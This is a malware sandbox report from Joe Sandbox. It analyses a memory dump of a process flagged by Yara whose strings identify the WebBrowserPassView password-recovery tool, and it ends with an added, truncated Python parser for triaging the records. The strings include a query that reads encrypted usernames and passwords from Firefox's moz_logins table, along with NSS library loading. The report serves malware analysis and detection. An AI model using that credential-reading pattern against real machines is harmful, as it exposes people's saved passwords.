                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 0040FA85
                                                                                                                                                                    • Part of subcall function 0040F7F1: GetCursorPos.USER32(?), ref: 0040F7FB
                                                                                                                                                                    • Part of subcall function 0040F7F1: GetSubMenu.USER32(?,00000000), ref: 0040F809
                                                                                                                                                                    • Part of subcall function 0040F7F1: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040F83A
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040FAA0
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 0040FAA9
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040FAB0
                                                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040FAF4
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040FB3D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                                  • String ID: WebBrowserPassView
                                                                                                                                                                  • API String ID: 3991541706-2171583229
                                                                                                                                                                  • Opcode ID: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
                                                                                                                                                                  • Instruction ID: d9273dffa9cc4a7b5f3d28471e210e7f23542924c6da0ead56af32090a150d55
                                                                                                                                                                  • Opcode Fuzzy Hash: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C51F431600105ABDB34AF64C895B6A77B6BF48310F104137F909AB6E1DB78EC55CF89
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                                                  • Opcode ID: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
                                                                                                                                                                  • Instruction ID: dc3f1f52df5294a2ec978d0ae6c3ccd5c38b38754740f987f7490d1c54cf7de8
                                                                                                                                                                  • Opcode Fuzzy Hash: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
                                                                                                                                                                  • Instruction Fuzzy Hash: 9141B275A00609BFEF11DFA8CD89FEEBBBAFB48304F100465E615A61A0C7716A50DB14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040A401,?,?,*.*,0040A46B,00000000), ref: 0040A250
                                                                                                                                                                    • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040A280
                                                                                                                                                                    • Part of subcall function 0040A19F: _memicmp.MSVCRT ref: 0040A1B9
                                                                                                                                                                    • Part of subcall function 0040A19F: memcpy.MSVCRT ref: 0040A1D0
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040A2C7
                                                                                                                                                                  • strchr.MSVCRT ref: 0040A2EC
                                                                                                                                                                  • strchr.MSVCRT ref: 0040A2FD
                                                                                                                                                                  • _strlwr.MSVCRT ref: 0040A30B
                                                                                                                                                                  • memset.MSVCRT ref: 0040A326
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A373
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                  • String ID: 4$h
                                                                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                                                                  • Opcode ID: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
                                                                                                                                                                  • Instruction ID: 17f5db22f20d9ae327a0934dc0a50b98bc11baf633b6527cb3b89d44c7cb3914
                                                                                                                                                                  • Opcode Fuzzy Hash: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31A271900218BFEB11EBA4CC85FEE77ACEB45354F10406AFA08E6181E7399F558B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%


Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558

APIs
• SetTimer.USER32 ref: 004055F3
• KillTimer.USER32(?,00000041), ref: 00405603
• KillTimer.USER32(?,00000041), ref: 00405614
• GetTickCount.KERNEL32 ref: 00405637
• GetParent.USER32(?), ref: 00405662
• SendMessageW.USER32(00000000), ref: 00405669
• BeginDeferWindowPos.USER32(00000004), ref: 00405677
• EndDeferWindowPos.USER32(00000000), ref: 004056C7
• InvalidateRect.USER32(?,?,00000001), ref: 004056D3
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475

Strings
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 0040E2AC
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 0040E378
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040E319
• <table dir="rtl"><tr><td>, xrefs: 0040E33C
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230

APIs
• wcschr.MSVCRT ref: 0041304A
• wcscpy.MSVCRT ref: 0041305A
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
  • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
• wcscpy.MSVCRT ref: 004130A9
• wcscat.MSVCRT ref: 004130B4
• memset.MSVCRT ref: 00413090
  • Part of subcall function 00408463: GetWindowsDirectoryW.KERNEL32(00453718,00000104,?,004130E9,?,?,00000000,00000208,-00000028), ref: 00408479
  • Part of subcall function 00408463: wcscpy.MSVCRT ref: 00408489
• memset.MSVCRT ref: 004130D8
• memcpy.MSVCRT ref: 004130F3
• wcscat.MSVCRT ref: 004130FF
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763

APIs
  • Part of subcall function 00443A61: memset.MSVCRT ref: 00443A8C
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AA3
  • Part of subcall function 00443A61: memset.MSVCRT ref: 00443AD6
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AEC
  • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443AFD
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B23
  • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B34
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B5B
  • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B6C
  • Part of subcall function 00443A61: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
  • Part of subcall function 00443A61: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
  • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
  • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
• memset.MSVCRT ref: 0040748C
  • Part of subcall function 00408C5E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,00402A35,?,?), ref: 00408C77
• memset.MSVCRT ref: 0040750B
• memset.MSVCRT ref: 00407520
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040765C
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407672
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407688
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040769E
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076B4
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076CA
• memset.MSVCRT ref: 004076E0
Strings
• SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins, xrefs: 004074D2
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
• String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins
• API String ID: 2096775815-1337997248

APIs
  • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
• malloc.MSVCRT ref: 00417FD2
• free.MSVCRT(?), ref: 00417FE2
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00417FF6
• free.MSVCRT(?), ref: 00417FFB
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00418011
• malloc.MSVCRT ref: 00418019
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041802C
• free.MSVCRT(?), ref: 00418031
• free.MSVCRT(?), ref: 00418045
• free.MSVCRT(00000000,0044C838,00000000), ref: 00418064
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID:
• API String ID: 3356672799-0
APIs
• EmptyClipboard.USER32 ref: 00407FA4
  • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
• GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
• GlobalLock.KERNEL32 ref: 00407FDF
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
• GlobalUnlock.KERNEL32(00000000), ref: 00408004
• SetClipboardData.USER32 ref: 0040800D
• GetLastError.KERNEL32 ref: 00408015
• CloseHandle.KERNEL32(?), ref: 00408021
• GetLastError.KERNEL32 ref: 0040802C
• CloseClipboard.USER32 ref: 00408035
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
• Instruction ID: 9cea1fd89fc17267dcd3af91661d4008ede421ba1dc4d9805cb8839a0273d96b
• Opcode Fuzzy Hash: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
• Instruction Fuzzy Hash: 71113D7A900A04FBDF105FB0ED4CB9E7BB8EB45365F100176F942E52A2DB748904DB68
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
• Instruction ID: 0ebae4f713cd0728fe49c3fef23c10be13eea51f6af137ba8aced86fbfd041bd
• Opcode Fuzzy Hash: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
• Instruction Fuzzy Hash: 59F0BBB169462D73342E25B85806AF70483F0C1B0537E45537702EA6D6EA4CCAC1E89F
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
• Instruction ID: bceec671b1c8862383177497c079c71e13407bcb6d3a60011dae78a89f936b1e
• Opcode Fuzzy Hash: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
• Instruction Fuzzy Hash: 65315BB2408340AFDB109F95DC44A9BB7E8FF89318F00487FF948A2291D779D905CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
• FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
• #17.COMCTL32(?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CDF
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
• Instruction ID: 34266bbb316567afe830504356b8b6584aa457591d2bf79f0dcd5bedfca56d80
• Opcode Fuzzy Hash: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
• Instruction Fuzzy Hash: B801D676754B116BEB215F649C89B6B7D9CEF42B4AB004039F502F2181DAB8DE0196A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 0041172A
• GetModuleHandleW.KERNEL32(sqlite3.dll,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 00411733
• GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 0041173C
• FreeLibrary.KERNEL32(00000000,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 0041174B
• FreeLibrary.KERNEL32(00000000,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 00411752
• FreeLibrary.KERNEL32(00000000,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 00411759
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeHandleLibraryModule
• String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
• API String ID: 662261464-3550686275
• Opcode ID: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
• Instruction ID: e2ab39130582ef49d5f09875a9cbab8dc3c3c45014a759ddc4c6379760142a6f
• Opcode Fuzzy Hash: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
• Instruction Fuzzy Hash: 7AE04F66F4136DA79A1027F66C84EAB6F5CC896AA13150037AF05A33519EA89C018AF9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy$memchrmemset
• String ID: UCD$UCD
• API String ID: 1581201632-670880344
• Opcode ID: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
• Instruction ID: 346eebee7d7e8b6f8d140da3993cfc901939ed9edb34b9035315ebb9ce6523fc
• Opcode Fuzzy Hash: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
• Instruction Fuzzy Hash: 8551D3719001195BEB10EFA8CC95FEEB7B8AF85300F0444ABF955E7281E778E644CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32 ref: 004085E9
• GetSystemMetrics.USER32 ref: 004085EF
• GetDC.USER32(00000000), ref: 004085FC
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040860D
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408614
• ReleaseDC.USER32 ref: 0040861B
• GetWindowRect.USER32 ref: 0040862E
• GetParent.USER32(?), ref: 00408633
• GetWindowRect.USER32 ref: 00408650
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004086AF
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
• Instruction ID: 6b5921239ffcae24bde8aad05d59603f054fe97e3a0e5988cf4f66e7c2dd28aa
• Opcode Fuzzy Hash: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
• Instruction Fuzzy Hash: 2E31A475A00609AFDF04CFB8CD85AEEBBB9FB48350F050539E901F3291DA71ED418A94
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
• Instruction ID: 99c2379fcd531e162887146704610c03ee1d54022b9859d6cf2ce1b1ac3fe7c7
• Opcode Fuzzy Hash: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
• Instruction Fuzzy Hash: 87616630408342DBDB68AF11D64852FB7B1FF84755F90093FF482A22D0D7B88989DB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadMenuW.USER32 ref: 0040BB4B
  • Part of subcall function 0040B974: GetMenuItemCount.USER32 ref: 0040B98A
  • Part of subcall function 0040B974: memset.MSVCRT ref: 0040B9A9
  • Part of subcall function 0040B974: GetMenuItemInfoW.USER32 ref: 0040B9E5
  • Part of subcall function 0040B974: wcschr.MSVCRT ref: 0040B9FD
• DestroyMenu.USER32(00000000), ref: 0040BB69
• CreateDialogParamW.USER32 ref: 0040BBB7
• memset.MSVCRT ref: 0040BBD3
• GetWindowTextW.USER32 ref: 0040BBE8
• EnumChildWindows.USER32 ref: 0040BC13
• DestroyWindow.USER32(00000000), ref: 0040BC1A
  • Part of subcall function 0040B7A3: _snwprintf.MSVCRT ref: 0040B7C8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 1928666178-4135340389
• Opcode ID: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
• Instruction ID: e22aff4ff37d874dc9406bb5861836d8cb00257f57c634ff68b223b0e4ee6d7d
• Opcode Fuzzy Hash: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
• Instruction Fuzzy Hash: 6821A172500218ABEF21AF50EC49EAF3B78FF46754F00447AF905A5192DB789990CBDE
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$TK@
• API String ID: 3979103747-3557169880
• Opcode ID: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
• Instruction ID: e896be4b8b4c8dd321127e9193ea498031fb30aa9e34a4c02f498fe4f9df0790
• Opcode Fuzzy Hash: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
• Instruction Fuzzy Hash: 6F2162B2800118ABDF20DF95CC45E8AB7B8FF44318F05846AEA48A7106DB78E618CBD4
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000,?,0040FF40,00000000), ref: 00407D1B
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5), ref: 00407D39
• wcslen.MSVCRT ref: 00407D46
• wcscpy.MSVCRT ref: 00407D56
• LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000), ref: 00407D60
• wcscpy.MSVCRT ref: 00407D70
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
• Instruction ID: f6f7092b450fef05d0d872bf5e04b1357ca4228fed94eee9f5e7a838667149bb
• Opcode Fuzzy Hash: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
• Instruction Fuzzy Hash: D201F771A041147BFB1527A0EC4AFAF7B6CDF567A1F20003AF506B10D1EA786E00D6AD
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
• wcscpy.MSVCRT ref: 0040BCA4
• wcscpy.MSVCRT ref: 0040BCB4
• GetPrivateProfileIntW.KERNEL32 ref: 0040BCC5
  • Part of subcall function 0040B82A: GetPrivateProfileStringW.KERNEL32(00453158,?,0044552C,004531E0,?,00452F48), ref: 0040B846
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
• Opcode ID: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
• Instruction ID: d09d9999bd57a78b58a4055e383115949195630bbf49bad653da3d74dfc2830b
• Opcode Fuzzy Hash: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
• Instruction Fuzzy Hash: 8AF0C232EC0A5137EB1137221D03F2A2608CF92B57F15847BB904762D3DA7C4A15D2DE
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• database is already attached, xrefs: 0042EF94
• unable to open database: %s, xrefs: 0042F0C1
• cannot ATTACH database within transaction, xrefs: 0042EED9
• out of memory, xrefs: 0042F0D8
• attached databases must use the same text encoding as main database, xrefs: 0042EFE2
• too many attached databases - max %d, xrefs: 0042EEC3
• database %s is already in use, xrefs: 0042EF3B
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
• Instruction ID: af9b9ef2f5a1795804296138b741be62980529f77760b3752da5ffa5b8d2aff6
• Opcode Fuzzy Hash: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
• Instruction Fuzzy Hash: E991E370B00311EFEB10DF66D581BAAB7F0AF44308F94846FE8559B242D778E945CB59
Uniqueness
Uniqueness Score: -1.00%

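The records in this part of the report are Joe Sandbox's per-function disassembly summaries, and a dump of the injected process (the 0x400000 image in PID 0xB) produces hundreds of them. Reading them by hand is slow, so the following is an added example, not part of the report or of Joe Sandbox, that parses such records into structured data: API references with module, argument list and (for "Part of subcall function" lines) the calling function's address, string cross-references, the similarity identifiers, and a per-DLL histogram. The two sample records are copied from this page (the FormatMessageW/netmsg.dll helper and the SQLite ATTACH function). The three marker strings are verbatim error messages from SQLite's attach.c, so finding all of them in a dump is a reliable sign of a statically linked SQLite, which password-recovery tooling uses to read browser profile databases. The decoding of the .sdmp file-name fields (process ID, base address, page protection) is an assumption about Joe Sandbox's naming scheme, except that 0x40 is the Windows PAGE_EXECUTE_READWRITE constant.

```python
# Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
# Similarity / Uniqueness blocks) into structured data for triage.
import re
from collections import Counter

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Yara matches",
            "Similarity", "Uniqueness"}

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})$")
# ASSUMED layout of Joe Sandbox dump names: pid.seq.ts.base.protect.type.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.\w+\.\w+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")

# Verbatim SQLite error messages (sqlite3 attach.c); all three present means
# a statically linked SQLite, used by credential harvesters to read browser DBs.
SQLITE_MARKERS = (
    "cannot ATTACH database within transaction",
    "too many attached databases - max %d",
    "attached databases must use the same text encoding as main database",
)


def _clean(line):
    return line.strip().lstrip("•").strip()


def parse_api(line):
    """One API line -> dict, or None if the line is not an API reference."""
    m = API_RE.match(_clean(line))
    if not m:
        return None
    return {"api": m["api"], "module": m["module"],
            "args": [a for a in (m["args"] or "").split(",") if a],
            "ref": int(m["ref"], 16),
            "parent": int(m["parent"], 16) if m["parent"] else None}


def parse_sdmp_name(name):
    m = SDMP_RE.match(name)
    if not m:
        return None
    protect = int(m["protect"], 16)
    return {"pid": int(m["pid"], 16), "base": int(m["base"], 16),
            "protect": protect, "rwx": protect == 0x40}  # PAGE_EXECUTE_READWRITE


def parse_records(text):
    records, rec, section = [], None, None
    for line in filter(None, map(_clean, text.splitlines())):
        if line in SECTIONS:
            if line == "APIs":  # every "APIs" header opens a new record
                rec = {"apis": [], "strings": [], "source": None, "meta": {}}
                records.append(rec)
            section = line
        elif rec is None:
            continue
        elif section == "APIs" and parse_api(line):
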